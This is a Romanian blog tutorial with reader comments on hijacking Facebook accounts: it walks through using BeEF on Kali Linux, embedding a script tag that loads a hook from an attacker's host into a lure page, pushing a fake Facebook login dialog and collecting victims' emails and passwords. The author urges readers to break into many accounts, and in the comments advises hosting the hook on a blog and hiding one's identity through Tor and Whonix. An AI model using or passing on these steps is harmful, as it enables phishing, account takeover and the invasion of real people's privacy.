Cum spargem un cont de Facebook utilizând ingineria socială [BeEF attack] + Tutorial Video
Bine ați revenit, dragii mei greenhorn hackers!
Multe persoane au accesat blogul blackweb.ro prin căutări de genul ,,cum spargi o parolă facebook“, ,,cum spargi un cont facebook“, ,,facebook hacking“, ,,soft de spart parole facebook gratuit”, ,,metode uluitoare de spart parole facebook”, ,,spargere parole facebook online”, ,,cum spargem parole facebook contra cost”, ,,program de spart parole facebook tpu beef”, ,,program de spart parole facebook online gratis beef”, ,,spargere cont facebook 2018″, ,,conturi de facebook sparte beef” și multe alte interogări. În primul rând, să nu credeți că o parolă facebook nu poate fi spartă. Totuși, lucrul acesta necesită anumite abilități, pe care le puteți dobândi doar dacă sunteți atenți puțin la ceea ce se postează pe blackweb.ro
(Toți utilizatorii facebook să fiți atenți, dacă nu doriți să fiți hackuiți!)
Pasul 1: Instalăm Kali Linux (dacă nu cumva am făcut deja lucrul acesta)
Primul lucru pe care îl avem de făcut este să descărcăm Kali Linux. De ce? Pentru că nu putem face un asemenea hack pe sistemul de operare Windows. În Kali Linux există un program numit Browser Exploitation Framework (BeEF). Programul este capabil să ne ajute să preluăm controlul browserului victimelor noastre. O dată ce avem controlul browser-ului, sunt foarte multe lucruri pe care le putem face. Unul dintre aceste lucruri este să-i păcălim să ne ofere datele conturilor facebook.
Pasul 2: Deschidem BeEF
Deschidem Kali Linux și o să fim întâmpinați de acest screen. Pornim BeEF dând click pe iconița cu văcuța din partea stângă a desktop-ului.
O să fim întâmpinați de ,,ecranul de pornire”, să-i spun așa.
Pasul 3: ,,Pescuim” browser-ul victimei
Cea mai simplă metodă este de a insera codul în propriul site și a scrie un articol interesant pentru victimă. Lucrul acesta se poate face prin inserarea unui link într-un text precum: Click aici pentru mai multe detalii sau Click aici pentru a vizualiza clip-ul. Folosiți-vă imaginația!
Scriptul arată ceva de genul:
<script src= “http://192.168.1.101:3000/hook.js” ; type= “text/javascript” ></script>
Pus într-o pagină web, iar atunci când cineva dă click pe el, tu deții controlul browser-ului. De aici, eu o să presupun că voi ați ,,agățat” browser-ul victimei.
Pasul 4: Trimitem o căsuță de dialog victimei
Atunci când am ,,agățat” browser-ul victimei, adresa IP, împreună cu pictogramele sistemului de operare și browser-ului ne va apărea în “Hooked Browsers” din partea stângă. Aici am utilizat browser-ul meu, pentru demonstrație. Chiar nu sunt atât de prost să fac o demonstrație utilizând o victimă, să le dau motiv ăstora să mă arunce la închisoare, pentru violarea corespondenței. Cât se mai dă? Între 3 și 5 ani?
Dacă dăm click pe browser-ul ,,agățat”, BeEF va deschide interfața în partea dreaptă. Observați că inițial avem detalii despre browser. Pe deasupra, mai avem câteva tab-uri. Momentan, pe noi ne interesează tab-ul ,,Commands”.
Acest modul ne permite să trimitem o fereastră pop-up în browser-ul victimei. În cazul nostru o să folosim căsuța de dialog Facebook.
Dacă dăm click pe ,,Dialog Type”, putem vedea că acest modul ne permite să mai creăm câte o căsuță de dialog și pentru LinkedIn, Windows, YouTube, Yammer, sau o căsuță de dialog generală. Selectăm ,,Facebook” în ,,Dialog Type”, apoi dăm click pe butonul ,,Execute”
Pasul 5: Căsuța de dialog apare pe sistemul victimei
Chiar dacă tu ești suspicios la vederea unui astfel de pop-up, cei mai mulți utilizatori chiar vor crede că sesiunea le-a expirat și vor introduce adresa de mail și parola.
Pasul 6: Adunăm datele
În interfața BeEF. putem vedea că aceste date apar în fereastra ,,COmmand results”. Victima a introdus adresa de mail și parola, iar acestea au fost capturate de BeEF.
Dacă sunteți cu adevărat determinați să spargeți cât mai multe conturi facebook, trebuie să știți că lucrul acesta nu este imposibil, iar ceea ce v-am prezentat este doar una din multele metode de a face lucrul acesta (probabil aceasta este ce mai simplă).
Dacă vrei să dezvolți abilitățile unui hacker cu adevărat competent, poți începe chiar acum, pe Blackweb.ro. Te asigur că vei căpăta cea mai prețioasă abilitate a secolului 21 – hacking-ul.
14
Leave a Reply
daca m-ar putea ajuta care-va sunt ebrahim fatal alfo pe facebook va rog ajutati-ma ofe
Lasă dracu’ hacăreala, Andreiuț! Pune mâna pe o carte de gramatică! 👍
@Edi: :))))
O simplă căutare o să vă arate că am peste 20 de volume publicate. În ultimul roman la care tocmai lucrez folosesc și un hacker pentru spargerea unui cont. Credeți că scena descrisă este veridică? Promit un volum cu autograf pentru această „consultanță” 🙂 Nu-l cunoșteam decât sub numele de Tache și nu aveam de la el decât un număr de telefon unde nu îmi răspundea nimeni, niciodată ci doar căsuța vocală unde lăsam un mesaj. Îl sunasem ieri și azi dimineața am primit un SMS prin care îmi era stabilită o întâlnire pentru azi la ora șase seara în… Read more »
Un hacker care să se prezinte cu numele/pseudonimul de Tache? Dați un search pe google la ,,hacking pseudonyms”, să vă faceți o idee… No offence, dar dacă un hacker s-ar prezenta cu numele de Tache, personal, l-aș considera puțin retardat. Pe deasupra, obișnuiți să mâncați virgule, iar ,,țineți” se scrie fără cratimă în exemplul dvs. Scriem cu cratimă dacă am spune ,,ține-ți minte propriul cod”. Desigur, mai sunt și alte greșeli, dar asta e treaba editorului dvs., nu a mea. Revenind la scena descrisă de dvs. Un cont de facebook se poate sparge în câteva minute butonând telefonul doar în… Read more »
Mulțumesc, am să modific în consecință …
Referitor la spargerea unui cont de facebook folosind ingineria
sociala , trebuie sa trimit persoanei in cauza un link cu o pagina web
hostata , adica online ????
Si scriptul din tutorial trebuie sa fie asemanator cu al vostru , as
avea nevoie de putin ajutor
Multumesc !!!
Poți integra script-ul într-un blog hostat de blogspot, pe care este scris un articol de interes pentru victimă. Scriptul este oferit de Beef. Tot ce se schimbă este ip-ul.
Metoda este valabila daca persoana in cauza foloseste un telefon mobil cu android sau ios???
Nu. Trebuie sa foloseasca pc-ul.
Ati putea sa faceti un tutorial in care sa ne prezentati cum trebuie sa ne protejam pentru a nu fi identificati?
Avem un astfel de tutorial aici: https://blackweb.ro/cum-rutam-tot-traficul-din-kali-linux-prin-tor-utilizand-whonix/ Totuși, trebuie să ținem minte un lucru: Cineva cu timp și resurse ne poate identifica oricând, indiferent de câte măsuri ne-am lua noi… Cei care spun că ei știu cum să rămână ,,complet invizibili”, mănâncă rahat cu ambele mâini. Personal, eu, un amărât de blogger, pot localiza și afla identitatea multora care doresc să rămână anonimi. Gândește-te ce ar putea face cineva’, cu mai multe cunoștințe ca ale mele și cu mulți bani la dispoziție… În special autoritățile. Că cei de la noi din țară sunt mai înceți la minte puțin și durează… Read more »
Tutorialul recomandat de dv. este doar pentru cei care folosesc kali linux pe virtualbox ca si sistem de operare secundar, nu?
Eu voiam niste sfaturi despre cum ne-am putea proteja identitatea atunci cand avem kali linux ca si sistem de operare principal.
Tutorialul prezentat este pentru cei care doresc să utilizeze Kali+Whonix prin Virtualbox, ceea ce este puțin mai greu.
Dacă aveți Kali instalat, puneți whonix pe un stick usb și îl rulați direct din Kali. Mai multe detalii pe:
https://www.whonix.org/wiki/Download
Acum, să răspund și la întrebarea de mai jos, dacă utilizatorul este pe fb utilizând aplicația fb pentru mobil, metoda nu va funcționa. Va trebui să așteptați să fie conectat de pe pc, înainte să inițiați atacul.
